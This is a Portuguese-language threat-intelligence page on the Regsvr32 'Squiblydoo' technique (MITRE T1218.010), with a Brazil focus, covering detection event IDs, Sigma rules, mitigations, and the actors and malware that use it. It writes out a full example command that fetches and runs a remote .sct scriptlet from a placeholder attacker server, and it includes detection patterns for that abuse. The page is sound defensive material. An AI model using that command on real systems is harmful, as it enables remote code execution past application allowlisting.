# T1218.010 - Regsvr32 ## Técnica Pai Esta é uma sub-técnica de [[t1218-system-binary-proxy-execution|T1218 - T1218 - System Binary Proxy Execution]]. ## Descrição Regsvr32.exe é um utilitário legítimo do Windows usado para registrar e cancelar o registro de componentes COM (Component Object Model), como bibliotecas DLL e controles ActiveX. Adversários abusam desse binário assinado pela Microsoft para executar código malicioso de forma indireta - uma técnica conhecida como *proxy execution* -, aproveitando-se do fato de que muitas soluções de segurança confiam em binários nativos do sistema e os incluem em listas de permissão (allowlists), sem monitorar adequadamente o que eles carregam. A variação mais explorada é chamada de "Squiblydoo": o atacante invoca `regsvr32.exe` passando como argumento uma URL remota apontando para um COM scriptlet (arquivo `.sct`) hospedado em servidor controlado pelo adversário. O `regsvr32.exe` baixa e executa o scriptlet sem registrar nada no Registro do Windows, sem exigir privilégios elevados e sem acionar a maioria dos controles de execução baseados em assinatura. Esse mecanismo permite contornar [[t1546-015-component-object-model-hijacking|Component Object Model Hijacking]] e políticas de AppLocker que bloqueiam executáveis não assinados. O processo filho herda as permissões do usuário que o invocou, tornando a técnica aplicável mesmo em ambientes com controles de UAC ativos. A técnica é amplamente documentada desde 2016 e continua sendo explorada porque a correção efetiva exige desativar funcionalidade legítima do sistema operacional. Além da execução remota de scriptlets, adversários também utilizam o `regsvr32.exe` para carregar DLLs maliciosas locais, estabelecer persistência via [[t1546-015-component-object-model-hijacking|Component Object Model Hijacking]] e como estágio intermediário em cadeias de infecção multi-fase envolvendo [[s0367-emotet|Emotet]], [[s0650-qakbot|QakBot]] e [[s0373-astaroth|Astaroth]]. **Contexto Brasil/LATAM:** O Brasil é um dos países com maior volume de ataques baseados em *living-off-the-land binaries* (LOLBins), e o `regsvr32.exe` figura consistentemente nas cadeias de infecção de campanhas financeiras direcionadas a clientes de bancos brasileiros. O grupo [[g0080-cobalt-group|Cobalt Group]] utilizou Squiblydoo em ataques contra instituições financeiras latino-americanas, e campanhas de phishing documentadas no Brasil - especialmente as que distribuem [[s0373-astaroth|Astaroth]] - empregam o `regsvr32.exe` como etapa central da cadeia de infecção, carregando módulos via COM scriptlets para evadir soluções de EDR e antivírus populares no mercado nacional. ## Attack Flow ```mermaid graph TB A([Phishing /<br/>Entrega]) --> B([Usuário Executa<br/>LNK ou Macro]) B --> C([regsvr32.exe<br/>Invocado]):::highlight C -->|URL remota ou DLL local| D([COM Scriptlet<br/>Executado]) D --> E([Payload<br/>Instalado / C2]) classDef highlight fill:#e74c3c,color:#fff ``` ## Como Funciona **Preparação** O adversário prepara um COM scriptlet malicioso (`.sct`) contendo código JScript ou VBScript que baixa e executa um payload de segundo estágio, ou diretamente uma DLL maliciosa a ser carregada via `regsvr32 /s /u /i:arquivo.dll`. O scriptlet pode ser hospedado em infraestrutura controlada pelo atacante ou embutido em documentos entregues por phishing. Em campanhas como as que distribuem [[s0367-emotet|Emotet]] no Brasil, o scriptlet é tipicamente referênciado por URL usando protocolos HTTP/HTTPS comuns para não disparar alertas de proxy. **Execução** A execução ocorre via linha de comando: `regsvr32.exe /s /n /u /i:http://servidor-atacante.com/payload.sct scrobj.dll`. O `/i` passa a URL como parâmetro para `scrobj.dll` (COM scriptlet handler nativo do Windows), o `/u` indica unregister (evita escrita no Registro), `/s` suprime diálogos e `/n` desativa o registro padrão. O processo é filho de um processo legítimo (Word, Excel, wscript) e o `regsvr32.exe` em si é assinado pela Microsoft - passando por soluções que verificam apenas a assinatura do binário, sem analisar seus argumentos ou comportamento em rede. **Pós-execução** Após a execução do scriptlet, o payload de segundo estágio - frequentemente [[s0250-koadic|Koadic]], [[s1155-covenant|Covenant]] ou um agente de [[s0650-qakbot|QakBot]] - estabelece canal C2 e inicia reconhecimento interno. O `regsvr32.exe` encerra sem deixar entradas no Registro relacionadas ao COM object, dificultando a análise forense baseada em artefatos de sistema de arquivos. A cadeia de processo (pai → `regsvr32.exe` → payload) é o principal artefato disponível para detecção retrospectiva via EDR. ## Detecção **Event IDs relevantes (Windows):** | Event ID | Fonte | Sinal | |----------|-------|-------| | 4688 / 1 (Sysmon) | Security / Sysmon | `regsvr32.exe` com argumentos contendo `/i:http` ou URL externa - altamente suspeito | | 3 | Sysmon | Conexão de rede de saída originada pelo processo `regsvr32.exe` | | 7 | Sysmon | Carregamento de `scrobj.dll` por `regsvr32.exe` - normal para Squiblydoo | | 4104 | PowerShell | Invocação de `regsvr32` via `Start-Process` ou `Invoke-Expression` em scripts | | 4663 | Security | Acesso a objetos COM não registrados previamente no Registro do sistema | | 11 | Sysmon | Criação de arquivo `.sct` em diretórios temporários (`%TEMP%`, `%APPDATA%`) | **Sigma Rule - Regsvr32 Remote Scriptlet Execution (Squiblydoo):** ```yaml title: Regsvr32 Remote COM Scriptlet Execution - Squiblydoo id: b8d4f2a1-3c7e-4b09-a5f8-2d1e9c6b3f77 status: stable description: > Detecta execução de COM scriptlet remoto via regsvr32.exe (técnica Squiblydoo). Alta fidelidade - regsvr32.exe raramente busca URLs em uso legítimo. author: RunkIntel daté: 2026-03-24 tags: - attack.defense_evasion - attack.t1218.010 logsource: product: windows category: process_creation detection: selection: Image|endswith: '\regsvr32.exe' CommandLine|contains: - '/i:http' - '/i:ftp' - 'scrobj.dll' condition: selection falsepositives: - Ferramentas de gestão de COM legítimas em ambientes de desenvolvimento (muito raras) level: high --- title: Regsvr32 Network Connection id: c1a5e3b7-9d2f-4c08-b6e4-7f3a8d2c1e94 status: stable description: Detecta conexão de rede iniciada por regsvr32.exe - comportamento anômalo. author: RunkIntel daté: 2026-03-24 tags: - attack.defense_evasion - attack.t1218.010 logsource: product: windows category: network_connection detection: selection: Image|endswith: '\regsvr32.exe' Initiated: 'true' condition: selection falsepositives: - Extremamente raros em uso legítimo level: high ``` ## Mitigação | Controle | Ação Recomendada | Prioridade para Orgs BR | |----------|-----------------|------------------------| | [[m1050-exploit-protection\|M1050 - Exploit Protection]] | Habilitar EMET/Windows Defender Exploit Guard com proteção de processo para `regsvr32.exe` | Alta | | AppLocker / WDAC | Criar regra que bloqueia argumentos de `regsvr32.exe` contendo URLs (`http://`, `https://`, `ftp://`) via script de política | Alta | | Bloqueio de saída de `regsvr32.exe` no proxy/firewall | Configurar proxy corporativo para rejeitar conexões HTTP/HTTPS originadas de `regsvr32.exe` (identificado pelo user-agent) | Alta | | Monitoramento de processo filho | Alertar quando `regsvr32.exe` for pai de processos como `cmd.exe`, `powershell.exe`, `wscript.exe` ou `mshta.exe` | Alta | | Atualização de assinaturas de EDR | Garantir que o EDR possui regras comportamentais específicas para Squiblydoo - não depender apenas de assinatura de hash | Média | | Conscientização anti-phishing | Treinar usuários para não abrir anexos `.lnk` ou macros que invoquem ferramentas de sistema - vetor comum no Brasil | Média | ## Threat Actors que Usam - [[g0127-ta551|TA551]] - grupo financeiramente motivado que distribui [[s0650-qakbot|QakBot]] e [[s0367-emotet|Emotet]] via Squiblydoo em campanhas de phishing de alto volume, com impacto documentado em empresas brasileiras. - [[g0009-deep-panda|Deep Panda]] - APT chinês que utilizou `regsvr32.exe` em campanhas de espionagem contra governo e setor de saúde nos EUA e América Latina. - [[g0080-cobalt-group|Cobalt Group]] - especializado em ataques a instituições financeiras; empregou Squiblydoo em operações contra bancos na América Latina, incluindo o Brasil. - [[g1053-storm-0501|Storm-0501]] - grupo de ransomware que usa `regsvr32.exe` como estágio de loader em cadeias de infecção multi-fase em ambientes corporativos Windows. - [[g0108-blue-mockingbird|Blue Mockingbird]] - grupo de cryptomining que abusa de `regsvr32.exe` para instalar mineradores em servidores Windows corporativos. - [[g0065-leviathan|Leviathan]] - APT chinês de espionagem marítima e defesa que usou variantes de Squiblydoo em campanhas contra alvos governamentais. - [[g0094-kimsuky|Kimsuky]] - grupo norte-coreano que utilizou `regsvr32.exe` em campanhas de phishing direcionadas a pesquisadores e think tanks. - [[g0100-inception-framework|Inception]] - grupo de espionagem que empregou COM scriptlets para evadir detecção em campanhas contra alvos de alto perfil. - [[g0090-wirte|WIRTE]] - grupo do Oriente Médio que incorporou Squiblydoo em campanhas de phishing direcionadas a governo e setor financeiro. - [[g0050-apt32|APT32]] - grupo vietnamita que utilizou `regsvr32.exe` com scriptlets para instalar backdoors em campanhas de espionagem regional, incluindo operações que afetaram a América Latina. ## Software Associado - [[s1018-saint-bot|Saint Bot]] - downloader que usa `regsvr32.exe` como mecanismo de carregamento inicial em campanhas de phishing. - [[s0650-qakbot|QakBot]] - banking trojan amplamente distribuído via Squiblydoo; historicamente um dos malwares mais ativos no Brasil. - [[s0367-emotet|Emotet]] - loader polimórfico que em múltiplas variantes utilizou `regsvr32.exe` para carregar módulos de segundo estágio. - [[s0229-orz|Orz]] - framework de pós-exploração que suporta carregamento via `regsvr32.exe` para evadir controles de AppLocker. - [[s0250-koadic|Koadic]] - ferramenta de C2 baseada em COM que pode ser entregue e executada via `regsvr32.exe` com scriptlets JScript. - [[s0476-valak|Valak]] - malware modular de múltiplos estágios que abusa de `regsvr32.exe` para carregar plugins adicionais. - [[squirrelwaffle|Squirrelwaffle]] - loader que utiliza `regsvr32.exe` como parte de cadeias de infecção que entregam [[s0650-qakbot|QakBot]] e Cobalt Strike. - [[s1047-mori|Mori]] - backdoor APT que usa `regsvr32.exe` para persistência e execução de payloads adicionais. - [[s1155-covenant|Covenant]] - framework de C2 open-source frequentemente entregue via Squiblydoo em campanhas de red team e ataques reais. - [[s0373-astaroth|Astaroth]] - trojan bancário de origem brasileira que emprega `regsvr32.exe` extensivamente na cadeia de infecção, tornando-o particularmente relevante no contexto nacional. --- *Fonte: [MITRE ATT&CK - T1218.010](https://attack.mitre.org/techniques/T1218/010)*